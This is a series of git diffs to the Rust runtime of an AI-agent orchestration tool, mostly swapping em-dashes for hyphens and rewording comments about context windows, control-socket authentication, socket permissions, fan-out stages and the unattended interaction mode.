@@ -2638,7 +2638,7 @@ mod tests {
         let assembled = with_tracing(|| window.assemble());
 
         // The orphaned tool_result message is stripped to empty and dropped,
-        // leaving no messages — so the "Begin." user fallback is synthesized.
+        // leaving no messages - so the "Begin." user fallback is synthesized.
         assert_eq!(assembled.messages.len(), 1);
         assert_eq!(assembled.messages[0].role, "user");
         assert_eq!(

--- a/crates/leviath-runtime/src/context_setup.rs
+++ b/crates/leviath-runtime/src/context_setup.rs
@@ -68,8 +68,8 @@ pub fn init_window_seeded(
         if let Some(region_name) = target {
             // Trim to the region's (already-resolved) budget first: `add_entry`
             // REJECTS an over-budget entry outright rather than truncating it, so
-            // without this a seed larger than its region — a big README, a long
-            // `git ls-files` — would silently leave the region completely empty.
+            // without this a seed larger than its region - a big README, a long
+            // `git ls-files` - would silently leave the region completely empty.
             let budget = window
                 .get_region(&region_name)
                 .map(|r| r.max_tokens)
@@ -124,7 +124,7 @@ fn task_region_name(blueprint: &Blueprint) -> Option<String> {
         .map(|r| r.name.clone())
 }
 
-/// Initialize a [`ContextWindow`] seeding only the task text — the thin
+/// Initialize a [`ContextWindow`] seeding only the task text - the thin
 /// back-compat wrapper over [`init_window_seeded`] used by callers that carry a
 /// single task string (the imperative engine and existing tests).
 pub fn init_window(window: &mut ContextWindow, blueprint: &Blueprint, task: &str) {
@@ -158,8 +158,8 @@ pub fn apply_layout(window: &mut ContextWindow, layout: &ContextLayout) {
 
     // Carry the message-stream regions across the transition even when the new
     // stage layout doesn't declare them. Dropping `conversation` (the sole
-    // SlidingWindow that holds typed turns) would strand the whole message history
-    // — the next stage would assemble with no messages, and its typed tool_use/
+    // SlidingWindow that holds typed turns) would strand the whole message history -
+    // the next stage would assemble with no messages, and its typed tool_use/
     // tool_result turns would have nowhere to land. `tool_results` likewise. A
     // blueprint that DOES declare them keeps its own budget (handled above).
     for infra in ["conversation", "tool_results"] {
@@ -251,7 +251,7 @@ mod tests {
         assert_eq!(fit_seed_to_budget(&exact, 10), exact);
     }
 
-    /// The token estimate `init_window_seeded` computes for a fitted seed — the
+    /// The token estimate `init_window_seeded` computes for a fitted seed - the
     /// number that has to land inside the region's budget.
     fn estimated_tokens(fitted: &str) -> usize {
         leviath_core::estimate_tokens(fitted)
@@ -274,7 +274,7 @@ mod tests {
         const MAX_TOKENS: usize = 60;
         let room = (MAX_TOKENS - 1) * 4 - SEED_TRUNCATION_MARKER.len();
         let mut s = "a".repeat(room - 1);
-        s.push('é'); // occupies bytes room-1 and room — the cut lands inside it
+        s.push('é'); // occupies bytes room-1 and room - the cut lands inside it
         s.push_str(&"b".repeat(500));
         assert!(!s.is_char_boundary(room), "test must straddle the cut");
 

--- a/crates/leviath-runtime/src/context_setup.rs
+++ b/crates/leviath-runtime/src/context_setup.rs
@@ -299,8 +299,9 @@ mod tests {
 
     #[test]
     fn init_window_seeded_truncates_a_seed_larger_than_its_region() {
-        // Regression: `add_entry` rejects an over-budget entry outright, so an
-        // untrimmed oversized seed used to leave the region completely EMPTY.
+        // Regression: `add_entry` rejects an over-budget entry outright, so a
+        // seed must be trimmed first - an untrimmed oversized seed leaves the
+        // region completely EMPTY.
         let bp = blueprint_with(vec![RegionDefinition::new(
             "facts".to_string(),
             RegionKind::Pinned,

--- a/crates/leviath-runtime/src/context_tools.rs
+++ b/crates/leviath-runtime/src/context_tools.rs
@@ -4,7 +4,7 @@
 //! These let an agent read and edit its own context-window regions. They operate
 //! directly on the [`ContextWindow`], so in the shared world they are applied by
 //! a pipeline system (which holds the ECS window) rather than by the async tool
-//! lane — [`handle_context_tool`] is the window-level core it calls. Ported from
+//! lane - [`handle_context_tool`] is the window-level core it calls. Ported from
 //! the imperative worker's `handle_context_tool`.
 
 use leviath_core::RegionKind;
@@ -34,7 +34,7 @@ fn region_not_found(name: &str, window: &ContextWindow) -> String {
 
 /// Apply one `context_*` tool call to `window`, returning the result text the
 /// model sees. Unknown tools and missing arguments yield `[error] …` strings
-/// (never a hard failure — the model reads and adjusts).
+/// (never a hard failure - the model reads and adjusts).
 pub fn handle_context_tool(
     name: &str,
     args: &serde_json::Value,
@@ -560,7 +560,7 @@ mod tests {
         );
         assert!(call(&mut w, "context_list", json!({"region": "files"})).contains("a.rs ("));
 
-        // All regions — covers every kind's label.
+        // All regions - covers every kind's label.
         let all = call(&mut w, "context_list", json!({}));
         for label in [
             "permanent",

--- a/crates/leviath-runtime/src/context_transform.rs
+++ b/crates/leviath-runtime/src/context_transform.rs
@@ -2,8 +2,8 @@
 //! from its parent's, when the blueprints declare a mapping.
 //!
 //! A [`Blueprint`](leviath_core::Blueprint) may declare
-//! [`ContextTransform`](leviath_core::blueprint::ContextTransform)s — `{from_blueprint,
-//! to_blueprint, mappings}` — describing how a parent's context regions flow into
+//! [`ContextTransform`](leviath_core::blueprint::ContextTransform)s - `{from_blueprint,
+//! to_blueprint, mappings}` - describing how a parent's context regions flow into
 //! a child's when the parent (blueprint A) spawns a child (blueprint B). This is
 //! how an agent hands work down the tree: the planner's plan region becomes the
 //! implementer's task region, findings become inputs, etc.
@@ -110,7 +110,7 @@ pub fn dispatch_content_summary(
     for (entity, state, pending, settings) in agents.iter() {
         crate::tick_scope::enter(entity);
         if state.status != AgentStatus::Active {
-            continue; // paused / cancelled — don't start new work
+            continue; // paused / cancelled - don't start new work
         }
         let Some(settings) = settings else {
             // No compaction config ⇒ can't summarize; keep the raw content.
@@ -124,7 +124,7 @@ pub fn dispatch_content_summary(
             continue;
         };
         let Some(permit) = stage.pools.try_acquire(&config.model) else {
-            continue; // pool full — retry next tick (keep the pending marker)
+            continue; // pool full - retry next tick (keep the pending marker)
         };
         let requests = pending
             .0
@@ -218,7 +218,7 @@ fn apply_content_transform(content: &str, transform: &Option<ContentTransform>) 
         Some(ContentTransform::Extract { fields }) => extract_fields(content, fields),
         // Summarize needs an async LLM call that isn't available at spawn time;
         // fall back to a direct copy so the data still transfers. (Follow-up:
-        // route through the compaction lane — tracked separately.)
+        // route through the compaction lane - tracked separately.)
         Some(ContentTransform::Summarize) => content.to_string(),
     }
 }

--- a/crates/leviath-runtime/src/control_socket/mod.rs
+++ b/crates/leviath-runtime/src/control_socket/mod.rs
@@ -564,11 +564,11 @@ impl ControlClient {
     /// A missing token file is **not** an error here. It has two very different
     /// causes - no daemon is running, or one is running that predates tokens -
     /// and the client cannot tell them apart, while the daemon can. Refusing to
-    /// even construct a client made the second case unrecoverable: a CLI that
-    /// had been upgraded could not ask the old daemon to shut down, so it could
-    /// neither stop it nor start a replacement, and the error it printed
-    /// ("Is the daemon running? Start it with `lev daemon start`") was advice
-    /// the user was already following.
+    /// even construct a client would make the second case unrecoverable: an
+    /// upgraded CLI could not ask the still-running pre-token daemon to shut
+    /// down, so it could neither stop it nor start a replacement, and the error
+    /// it printed ("Is the daemon running? Start it with `lev daemon start`")
+    /// would be advice the user was already following.
     ///
     /// The daemon is the enforcer. A client with no token connects, is refused
     /// if the daemon requires one, and reports *that* - which is accurate.
@@ -838,10 +838,10 @@ mod tests {
 
     /// A missing token file must not stop a client from being built. It has two
     /// causes the client cannot tell apart - no daemon, or one running that
-    /// predates tokens - and refusing here made an upgrade unrecoverable: the
-    /// CLI could not ask the old daemon to shut down, so it could neither stop
-    /// it nor start a replacement, while printing advice the user was already
-    /// following.
+    /// predates tokens - and refusing here would make an upgrade unrecoverable:
+    /// the CLI could not ask the still-running pre-token daemon to shut down,
+    /// so it could neither stop it nor start a replacement, while printing
+    /// advice the user was already following.
     #[test]
     fn a_missing_token_still_builds_a_client() {
         let dir = tempfile::tempdir().unwrap();
@@ -1555,8 +1555,9 @@ mod tests {
     }
 
     /// A daemon that accepts the connection but never answers must not hang the
-    /// client. `lev cancel` against a wedged daemon used to block forever with no
-    /// output - nothing to see, nothing to act on, and no way to kill the run.
+    /// client: without a timeout, `lev cancel` against a wedged daemon blocks
+    /// forever with no output - nothing to see, nothing to act on, and no way
+    /// to kill the run.
     #[tokio::test]
     async fn client_times_out_on_a_daemon_that_never_answers() {
         let (mut listener, id, _dir) = test_listener();

--- a/crates/leviath-runtime/src/control_socket/mod.rs
+++ b/crates/leviath-runtime/src/control_socket/mod.rs
@@ -10,9 +10,9 @@
 //! - **Windows** → a named pipe (`\\.\pipe\…`, guarded by its security
 //!   descriptor).
 //!
-//! Each platform module exposes the same small surface — [`ControlId`],
+//! Each platform module exposes the same small surface - [`ControlId`],
 //! [`control_id`], [`bind_control_listener`], [`ControlListener::accept`],
-//! [`connect`], and [`is_daemon_running`] — over which the shared
+//! [`connect`], and [`is_daemon_running`] - over which the shared
 //! [`handle_connection`] (generic over any `AsyncRead + AsyncWrite`) and
 //! [`ControlClient`] operate. It is the default, always-on management channel
 //! (the opt-in HTTP API that `lev serve` toggles is a separate surface).
@@ -56,7 +56,7 @@ const AUTH_REQUIRED: &str = "authentication";
 /// # Why this exists
 ///
 /// On Unix the daemon asks the kernel which uid is on the other end of the
-/// socket and refuses anything that is not its own — see the peer check in the
+/// socket and refuses anything that is not its own - see the peer check in the
 /// `unix` module. Windows offers an equivalent, but reaching it means calling
 /// `ImpersonateNamedPipeClient` and comparing security identifiers through raw
 /// FFI, and this workspace is `unsafe_code = "forbid"` from top to bottom. So
@@ -67,7 +67,7 @@ const AUTH_REQUIRED: &str = "authentication";
 /// A token closes that without any of the FFI. The daemon writes a fresh random
 /// secret into its own directory, readable only by the owner, and refuses any
 /// connection that cannot quote it. A caller who can read the file is a caller
-/// who can already read `config.toml` — so the token grants nothing that was not
+/// who can already read `config.toml` - so the token grants nothing that was not
 /// already reachable, which is exactly the property wanted.
 ///
 /// It is required on every platform, not only Windows. One protocol is easier to
@@ -94,7 +94,7 @@ impl ControlToken {
     /// Where the daemon records its own process id.
     ///
     /// So `lev daemon stop` has a way through when the control channel does not
-    /// answer — a wedged daemon, or a token file that went missing. Without it
+    /// answer - a wedged daemon, or a token file that went missing. Without it
     /// the only recovery was `pkill`, and the advice to "restart it" was advice
     /// that could not work: `restart` stops before it starts, and the stop was
     /// the part that failed.
@@ -121,7 +121,7 @@ impl ControlToken {
 
     /// Generate a fresh token and write it owner-only.
     ///
-    /// Called at bind, so a restarted daemon invalidates every previous token —
+    /// Called at bind, so a restarted daemon invalidates every previous token -
     /// a stale one cannot be replayed against the new process.
     pub fn create(dir: &Path) -> std::io::Result<Self> {
         use rand::RngExt as _;
@@ -166,7 +166,7 @@ pub enum ControlRequest {
     /// Prove the caller is this user, by quoting the daemon's control token.
     ///
     /// Must be the first request on a connection. Until it succeeds the daemon
-    /// answers nothing else — see [`ControlToken`] for why.
+    /// answers nothing else - see [`ControlToken`] for why.
     Authenticate {
         /// The token read from `<leviath-home>/control.token`.
         token: String,
@@ -423,8 +423,8 @@ where
         }
 
         // Until the caller has proved who it is, `Authenticate` is the only
-        // request that gets an answer. Anything else -- including a malformed
-        // line -- is refused and the connection dropped, so an unauthenticated
+        // request that gets an answer. Anything else - including a malformed
+        // line - is refused and the connection dropped, so an unauthenticated
         // peer cannot sit probing the protocol.
         if !authenticated {
             let refused = match serde_json::from_str::<ControlRequest>(&line) {
@@ -480,7 +480,7 @@ async fn write_line<W>(write_half: &mut W, response: &ControlResponse)
 where
     W: AsyncWrite + Unpin,
 {
-    // `ControlResponse` is a plain serde enum — serialization is infallible.
+    // `ControlResponse` is a plain serde enum - serialization is infallible.
     let mut out = serde_json::to_string(response).expect("ControlResponse serializes");
     out.push('\n');
     let _ = write_half.write_all(out.as_bytes()).await;
@@ -544,7 +544,7 @@ impl ControlClient {
     ///
     /// Only reaches a daemon that runs without one, which in practice means a
     /// test driving the protocol directly. Real callers use
-    /// [`with_token`](Self::with_token) — see [`ControlToken`].
+    /// [`with_token`](Self::with_token) - see [`ControlToken`].
     pub fn new(id: impl Into<ControlId>) -> Self {
         Self {
             id: id.into(),
@@ -562,7 +562,7 @@ impl ControlClient {
     /// A client that reads the daemon's token out of `dir`.
     ///
     /// A missing token file is **not** an error here. It has two very different
-    /// causes — no daemon is running, or one is running that predates tokens —
+    /// causes - no daemon is running, or one is running that predates tokens -
     /// and the client cannot tell them apart, while the daemon can. Refusing to
     /// even construct a client made the second case unrecoverable: a CLI that
     /// had been upgraded could not ask the old daemon to shut down, so it could
@@ -571,7 +571,7 @@ impl ControlClient {
     /// the user was already following.
     ///
     /// The daemon is the enforcer. A client with no token connects, is refused
-    /// if the daemon requires one, and reports *that* — which is accurate.
+    /// if the daemon requires one, and reports *that* - which is accurate.
     pub fn for_home(id: impl Into<ControlId>, dir: &Path) -> Self {
         Self {
             id: id.into(),
@@ -585,7 +585,7 @@ impl ControlClient {
         let detail = match (&self.token, &self.token_dir) {
             (None, Some(dir)) => format!(
                 "no control token was found at {}. If a daemon is running, it was \
-                 started by a different user or before this file existed — restart \
+                 started by a different user or before this file existed - restart \
                  it with `lev daemon restart`.",
                 ControlToken::path(dir).display()
             ),
@@ -602,7 +602,7 @@ impl ControlClient {
     pub async fn request(&self, req: &ControlRequest) -> std::io::Result<ControlResponse> {
         // The daemon services control ops from a single loop, so one op that
         // takes a long time (or a wedged world) delays every other client. With
-        // no deadline, `lev cancel` and the dashboard simply hung — no output, no
+        // no deadline, `lev cancel` and the dashboard simply hung - no output, no
         // error, nothing to act on. A timeout turns that into a failure the
         // caller can fall back from.
         let deadline = timeout_for(req);
@@ -624,7 +624,7 @@ impl ControlClient {
 
         // Authenticate first, on every connection: the client opens a fresh one
         // per request, so there is no session to carry the proof across. With no
-        // token we send nothing and go straight to the request — a daemon that
+        // token we send nothing and go straight to the request - a daemon that
         // predates tokens serves it, and one that requires them refuses, which
         // is the outcome we want to report either way.
         if let Some(token) = &self.token {
@@ -636,7 +636,7 @@ impl ControlClient {
             let _ = write_half.write_all(line.as_bytes()).await;
 
             // `.ok().flatten()`: a read error and a clean EOF are the same fact
-            // here -- the daemon did not answer the handshake -- and giving the
+            // here - the daemon did not answer the handshake - and giving the
             // error its own `?` arm leaves a branch no test can drive.
             match lines.next_line().await.ok().flatten() {
                 Some(resp) => match serde_json::from_str::<ControlResponse>(&resp) {
@@ -746,7 +746,7 @@ mod tests {
     // ── Control-channel authentication ──────────────────────────────────────
 
     /// `lev daemon stop` needs a way through when the control channel does not
-    /// answer, because `restart` stops before it starts — so a daemon that had
+    /// answer, because `restart` stops before it starts - so a daemon that had
     /// lost its token file could not be restarted, only `pkill`ed.
     #[test]
     fn the_daemon_pid_round_trips_and_a_missing_or_junk_file_is_no_pid() {
@@ -837,8 +837,8 @@ mod tests {
     }
 
     /// A missing token file must not stop a client from being built. It has two
-    /// causes the client cannot tell apart — no daemon, or one running that
-    /// predates tokens — and refusing here made an upgrade unrecoverable: the
+    /// causes the client cannot tell apart - no daemon, or one running that
+    /// predates tokens - and refusing here made an upgrade unrecoverable: the
     /// CLI could not ask the old daemon to shut down, so it could neither stop
     /// it nor start a replacement, while printing advice the user was already
     /// following.
@@ -852,7 +852,7 @@ mod tests {
     }
 
     /// And when we *did* present one and were still refused, the message says
-    /// that instead — the two situations need different fixes.
+    /// that instead - the two situations need different fixes.
     #[test]
     fn a_rejected_token_reads_differently_from_a_missing_one() {
         let dir = tempfile::tempdir().unwrap();
@@ -1113,7 +1113,7 @@ mod tests {
     }
 
     /// `create` reports rather than panicking when its directory cannot be
-    /// written -- a read-only home should fail the daemon loudly, not leave it
+    /// written - a read-only home should fail the daemon loudly, not leave it
     /// running with no way for clients to authenticate.
     #[test]
     fn creating_a_token_in_an_unwritable_place_is_an_error() {
@@ -1556,13 +1556,13 @@ mod tests {
 
     /// A daemon that accepts the connection but never answers must not hang the
     /// client. `lev cancel` against a wedged daemon used to block forever with no
-    /// output — nothing to see, nothing to act on, and no way to kill the run.
+    /// output - nothing to see, nothing to act on, and no way to kill the run.
     #[tokio::test]
     async fn client_times_out_on_a_daemon_that_never_answers() {
         let (mut listener, id, _dir) = test_listener();
         // The server reads the request, then hands both halves back and exits.
         // The test holds them, so the connection stays open with no reply ever
-        // sent — a daemon that accepted the work and went quiet. Handing them
+        // sent - a daemon that accepted the work and went quiet. Handing them
         // over (rather than parking the task on a future that never resolves)
         // lets the task actually finish.
         let (tx, rx) = oneshot::channel();
@@ -1616,7 +1616,7 @@ mod tests {
     }
 
     /// A spawn connects the blueprint's MCP servers first (30s each), so it gets
-    /// a longer floor than the interactive ops — otherwise a slow-but-succeeding
+    /// a longer floor than the interactive ops - otherwise a slow-but-succeeding
     /// spawn is reported to the user as a timeout.
     #[test]
     fn spawn_gets_a_longer_deadline_than_other_ops() {

--- a/crates/leviath-runtime/src/control_socket/unix.rs
+++ b/crates/leviath-runtime/src/control_socket/unix.rs
@@ -1,12 +1,11 @@
 //! Unix-domain-socket transport for the control channel.
 //!
 //! A [`ControlId`] is a filesystem path; the socket is never reachable off the
-//! machine, and access to it is governed by ordinary file permissions -
-//! permissions [`bind_control_listener`] now actually sets. It previously only
-//! asserted that in this comment: neither the socket nor the directory it
-//! creates was ever `chmod`ed, so both landed at the process umask (typically
-//! 0755, and group-writable under a 0002 umask). Anyone who can connect can
-//! spawn a tool-executing agent and answer its approval prompts.
+//! machine, and access to it is governed by ordinary file permissions - which
+//! [`bind_control_listener`] must set explicitly, never assume. An un-`chmod`ed
+//! socket and directory land at the process umask (typically 0755, and
+//! group-writable under a 0002 umask), and anyone who can connect can spawn a
+//! tool-executing agent and answer its approval prompts.
 
 use std::path::{Path, PathBuf};
 
@@ -43,9 +42,9 @@ impl ControlListener {
     ///
     /// A connection from another uid is closed and skipped rather than returned,
     /// so the daemon loop above never sees it and no `handle_connection` runs
-    /// for it. There was no authentication here at all before, and the ops this
-    /// channel accepts spawn tool-executing agents and answer their approval
-    /// prompts.
+    /// for it. This uid check is the channel's authentication, and it cannot be
+    /// skipped: the ops this channel accepts spawn tool-executing agents and
+    /// answer their approval prompts.
     ///
     /// The socket's 0600 mode is not sufficient on its own: on macOS and the
     /// BSDs, permissions on a Unix socket are not consulted at `connect` time.

--- a/crates/leviath-runtime/src/control_socket/unix.rs
+++ b/crates/leviath-runtime/src/control_socket/unix.rs
@@ -1,7 +1,7 @@
 //! Unix-domain-socket transport for the control channel.
 //!
 //! A [`ControlId`] is a filesystem path; the socket is never reachable off the
-//! machine, and access to it is governed by ordinary file permissions —
+//! machine, and access to it is governed by ordinary file permissions -
 //! permissions [`bind_control_listener`] now actually sets. It previously only
 //! asserted that in this comment: neither the socket nor the directory it
 //! creates was ever `chmod`ed, so both landed at the process umask (typically
@@ -64,8 +64,8 @@ impl ControlListener {
     /// A `fn` pointer (not `impl Fn`) so there is one monomorphization. The seam
     /// exists because the refusal arms cannot be reached otherwise: producing a
     /// connection from a *different* uid needs a second user account or root,
-    /// which no CI runner has. Injecting the lookup lets both refusals — a
-    /// foreign uid and an undeterminable one — be driven against a real socket.
+    /// which no CI runner has. Injecting the lookup lets both refusals - a
+    /// foreign uid and an undeterminable one - be driven against a real socket.
     async fn accept_with(
         &mut self,
         peer_uid: fn(&ServerStream) -> Option<u32>,
@@ -94,7 +94,7 @@ pub fn bind_control_listener(id: &Path) -> std::io::Result<ControlListener> {
                 "a leviath daemon is already running on this control socket",
             ));
         }
-        // Nothing is listening — the socket file is stale; clear it. A failed
+        // Nothing is listening - the socket file is stale; clear it. A failed
         // remove just means the bind below reports the problem instead.
         let _ = std::fs::remove_file(id);
     }
@@ -114,8 +114,8 @@ pub fn bind_control_listener(id: &Path) -> std::io::Result<ControlListener> {
     // per-connection peer check in `accept_authorized` is the real gate and this
     // is defence in depth rather than the whole story.
     // Best-effort, like the directory above: `chmod` on a socket we just created
-    // and own does not realistically fail, and the peer check in `accept` — not
-    // this mode — is what actually holds on macOS and the BSDs, where socket
+    // and own does not realistically fail, and the peer check in `accept` - not
+    // this mode - is what actually holds on macOS and the BSDs, where socket
     // permissions are not consulted at `connect` time.
     let _ = leviath_sys::secure_file_perms(id);
     Ok(ControlListener(listener))
@@ -123,7 +123,7 @@ pub fn bind_control_listener(id: &Path) -> std::io::Result<ControlListener> {
 
 /// Whether an accepted connection's peer is this same user.
 ///
-/// `None` — the platform could not report a uid — is refused. An unidentifiable
+/// `None` - the platform could not report a uid - is refused. An unidentifiable
 /// caller is not an authorized one, and failing open here would undo the whole
 /// point on any platform where the lookup is unavailable.
 fn peer_is_ours(peer: Option<u32>, ours: u32) -> bool {
@@ -170,7 +170,7 @@ mod tests {
     }
 
     /// The module doc claimed "access is governed by ordinary file permissions"
-    /// while setting none of them — both the socket and the directory landed at
+    /// while setting none of them - both the socket and the directory landed at
     /// the process umask. Anyone who could connect could spawn a tool-executing
     /// agent.
     #[tokio::test]
@@ -194,7 +194,7 @@ mod tests {
 
     /// Both refusal arms, driven against a real socket with the peer lookup
     /// injected. A connection from a *different* uid needs a second user account
-    /// or root, which no CI runner has — so the lookup is the seam rather than
+    /// or root, which no CI runner has - so the lookup is the seam rather than
     /// the socket.
     #[tokio::test]
     async fn accept_skips_connections_that_are_not_ours() {
@@ -218,7 +218,7 @@ mod tests {
 
             // Connect first and keep the client alive: a Unix-socket `connect`
             // completes as soon as the listener has queued it, so no spawned
-            // task is needed — and no abort, whose half-run future would read as
+            // task is needed - and no abort, whose half-run future would read as
             // a partially covered region.
             let _client = connect(&id).await.expect("connecting succeeds");
             let accepted = listener
@@ -240,7 +240,7 @@ mod tests {
         assert!(!peer_is_ours(None, 1000), "an unknown peer fails closed");
     }
 
-    /// A connection from this same user is accepted — the peer check must not
+    /// A connection from this same user is accepted - the peer check must not
     /// lock the daemon out of its own socket.
     #[tokio::test]
     async fn accept_admits_a_connection_from_the_same_user() {

--- a/crates/leviath-runtime/src/control_socket/windows.rs
+++ b/crates/leviath-runtime/src/control_socket/windows.rs
@@ -14,7 +14,7 @@ use tokio::net::windows::named_pipe::{
 };
 
 /// `ERROR_ACCESS_DENIED`: returned by a `first_pipe_instance` create when the
-/// pipe already exists — i.e. another daemon owns it.
+/// pipe already exists - i.e. another daemon owns it.
 const ERROR_ACCESS_DENIED: i32 = 5;
 
 /// Identifies a control pipe: its full `\\.\pipe\…` name.
@@ -54,12 +54,12 @@ pub struct ControlListener {
 }
 
 impl ControlListener {
-    /// Wait for the next client, then return the connected server stream —
+    /// Wait for the next client, then return the connected server stream -
     /// pre-creating the following instance so the pipe name stays resolvable for
     /// the next client while this one is served.
     ///
     /// Written as a combinator chain (rather than `?`) so the error short-circuit
-    /// lives in `Result`, not in a branch of this function — the happy path is
+    /// lives in `Result`, not in a branch of this function - the happy path is
     /// the only thing this source expresses, keeping it fully covered while still
     /// propagating any real connect/create failure.
     ///
@@ -74,7 +74,7 @@ impl ControlListener {
     /// pipe accepts is served.
     ///
     /// What stands between another local user and this channel on Windows is
-    /// therefore the pipe's security descriptor alone — and this code does not
+    /// therefore the pipe's security descriptor alone - and this code does not
     /// set one, so it is the default. That is weaker than the Unix side, where
     /// the kernel-reported uid is the gate. Documented in `SECURITY.md` rather
     /// than papered over; see the Unix module for what the check buys.
@@ -90,7 +90,7 @@ impl ControlListener {
 /// Bind the daemon's control pipe named `id`, enforcing a single instance.
 ///
 /// Creating the *first* instance of the pipe fails with `ERROR_ACCESS_DENIED`
-/// if the pipe already exists — i.e. another daemon owns it — which is mapped to
+/// if the pipe already exists - i.e. another daemon owns it - which is mapped to
 /// [`std::io::ErrorKind::AddrInUse`].
 pub fn bind_control_listener(id: &str) -> std::io::Result<ControlListener> {
     let pending = ServerOptions::new()

--- a/crates/leviath-runtime/src/dynamic_interaction.rs
+++ b/crates/leviath-runtime/src/dynamic_interaction.rs
@@ -5,7 +5,7 @@
 //! always fired), these are ordinary tool calls the model makes on its own
 //! judgment, mid-reasoning. Both the background worker (file-based IPC) and
 //! the foreground (stdin) run modes need to intercept these tool names
-//! before they ever reach the generic tool registry — this module holds
+//! before they ever reach the generic tool registry - this module holds
 //! that shared logic behind an [`InteractionBackend`] trait so it can be
 //! unit tested with a mock instead of only living inside untestable
 //! closures.
@@ -118,12 +118,12 @@ pub const UNATTENDED_NO_ANSWER: &str =
 /// see.
 ///
 /// `--yolo` means "run without a human", so a prompt that blocks on one would
-/// park the run forever — a headless run would hang at the first
+/// park the run forever - a headless run would hang at the first
 /// `ask_user_confirm` (issue #107).
 ///
 /// A confirmation is approved: that is exactly what the flag promises. A
-/// *choice* is deliberately **not** made — picking option 0 unseen could select
-/// "Abort" or a destructive branch — so the model is told no one answered and
+/// *choice* is deliberately **not** made - picking option 0 unseen could select
+/// "Abort" or a destructive branch - so the model is told no one answered and
 /// left to decide. An edit submits the document unchanged, and a document put up
 /// for review is acknowledged without comment (a review is a `FreeText` request
 /// carrying a `body`; a question is one without).
@@ -915,7 +915,7 @@ mod tests {
             |_req| InteractionResponse::text("", "");
         let denied = resolve_gate_with_asker(&blocked_decision("shell"), "plan", text_asker);
         assert_eq!(denied, GateResolution::Deny);
-        // A non-block decision short-circuits to AllowOnce without asking — the
+        // A non-block decision short-circuits to AllowOnce without asking - the
         // (already-covered) asker is never invoked.
         let r = resolve_gate_with_asker(
             &leviath_core::taint::GateDecision::Allowed,
@@ -934,7 +934,7 @@ mod tests {
         // must come back with something the model can act on.
         let backend = UnattendedInteraction;
 
-        // A confirmation is approved — that is what the flag promises.
+        // A confirmation is approved - that is what the flag promises.
         let confirmed = dispatch_dynamic_interaction(
             &backend,
             "ask_user_confirm",

--- a/crates/leviath-runtime/src/dynamic_interaction.rs
+++ b/crates/leviath-runtime/src/dynamic_interaction.rs
@@ -119,7 +119,7 @@ pub const UNATTENDED_NO_ANSWER: &str =
 ///
 /// `--yolo` means "run without a human", so a prompt that blocks on one would
 /// park the run forever - a headless run would hang at the first
-/// `ask_user_confirm` (issue #107).
+/// `ask_user_confirm`.
 ///
 /// A confirmation is approved: that is exactly what the flag promises. A
 /// *choice* is deliberately **not** made - picking option 0 unseen could select

--- a/crates/leviath-runtime/src/fanout.rs
+++ b/crates/leviath-runtime/src/fanout.rs
@@ -1,12 +1,12 @@
 //! Fan-out stage handling as ECS systems.
 //!
 //! A `fan_out` stage (see [`leviath_core::blueprint::StageMode::FanOut`]) runs
-//! its single inference as a **split** — its prompt (with the config's
+//! its single inference as a **split** - its prompt (with the config's
 //! `split_prompt` folded in by [`crate::pipeline`]) asks the model for a JSON
 //! array of work items. [`fan_out_split`] intercepts that response (before the
 //! normal `process_response` routing), parses the items, and parks the parent in
-//! [`FanOutWaiting`]. [`fan_out_collect`] then starts one worker per item —
-//! bounded by `max_workers` concurrent workers — via the daemon-installed
+//! [`FanOutWaiting`]. [`fan_out_collect`] then starts one worker per item -
+//! bounded by `max_workers` concurrent workers - via the daemon-installed
 //! [`FanOutSpawner`], tracks them as the parent's `SubAgentChildren`, and once
 //! every worker is terminal applies the failure policy, injects a consolidated
 //! report into the parent's conversation, and transitions to the `merge_stage`
@@ -83,7 +83,7 @@ pub struct FanOutSpawnerRes(pub Arc<dyn FanOutSpawner>);
 
 /// A currently-running fan-out worker: its work-item id, its live entity, and
 /// its run-id (kept so the waiting state can be persisted/restored without a
-/// cross-entity lookup — see [`FanOutState`]).
+/// cross-entity lookup - see [`FanOutState`]).
 struct ActiveWorker {
     item_id: String,
     entity: Entity,
@@ -174,7 +174,7 @@ pub fn restore_fan_out_waiting(
 }
 
 /// Fan-out split system (exclusive): for each `ProcessResponse` agent whose
-/// current stage is a fan-out stage, consume its response as the split output —
+/// current stage is a fan-out stage, consume its response as the split output -
 /// parse the work items and park the agent in [`FanOutWaiting`] (or mark it
 /// `Error` if the split output isn't a JSON array). Removing `ProcessResponse`
 /// here keeps the normal `process_response` routing from touching these agents.
@@ -231,7 +231,7 @@ pub fn fan_out_split(world: &mut World) {
     }
 }
 
-/// Fan-out collect system (exclusive): drive each [`FanOutWaiting`] parent — reap
+/// Fan-out collect system (exclusive): drive each [`FanOutWaiting`] parent - reap
 /// finished workers, start pending ones up to `max_workers`, and once none remain
 /// running apply the failure policy, inject the consolidated report, and
 /// transition to the merge stage (or resolve the stage's own transition).

--- a/crates/leviath-runtime/src/gate_prompt.rs
+++ b/crates/leviath-runtime/src/gate_prompt.rs
@@ -3,7 +3,7 @@
 //! When the taint gate blocks an outbound tool call (it would leak
 //! over-cleared data), the default is to return a `[blocked]` result. When an
 //! [`InteractionHub`] is available (the daemon), the block instead becomes a
-//! prompt — "Allow once / Allow for this session / Deny" — mirroring tool
+//! prompt - "Allow once / Allow for this session / Deny" - mirroring tool
 //! approval. The user's choice is applied via
 //! [`TaintGate::apply_resolution`](crate::taint::TaintGate::apply_resolution):
 //! allow (once) executes the call; allow-for-session also raises the tool's

--- a/crates/leviath-runtime/src/host.rs
+++ b/crates/leviath-runtime/src/host.rs
@@ -124,8 +124,8 @@ pub type Reaper = Box<dyn FnMut(&mut PipelineWorld, Entity) + Send>;
 
 /// An async hook the host awaits *before* servicing a top-level `Spawn` control
 /// op, so the daemon can do async preparation the sync spawner can't - e.g.
-/// lazily connecting the blueprint's MCP servers into the shared pool (issue #97)
-/// so they're warm by the time [`Spawner`] reads them. The returned future is
+/// lazily connecting the blueprint's MCP servers into the shared pool so
+/// they're warm by the time [`Spawner`] reads them. The returned future is
 /// `'static` (it must clone anything it needs from the `SpawnArgs`). Installed
 /// with [`WorldHost::set_spawn_preprocessor`]; when none is set, spawns proceed
 /// straight to the spawner.
@@ -983,9 +983,10 @@ impl WorldHost {
                     }
                     None => Err("this daemon cannot spawn agents".to_string()),
                 };
-                // A failed spawn used to be invisible daemon-side: the error went
-                // back over the socket to a client that has already exited, and
-                // nothing was written to disk (issue #107).
+                // A failed spawn must leave a trace daemon-side: the error goes
+                // back over the socket to a client that may have already exited,
+                // and nothing is written to disk, so without this log line the
+                // failure is invisible (issue #107).
                 if let Err(error) = &result {
                     tracing::error!(
                         run_id = %args.run_id,

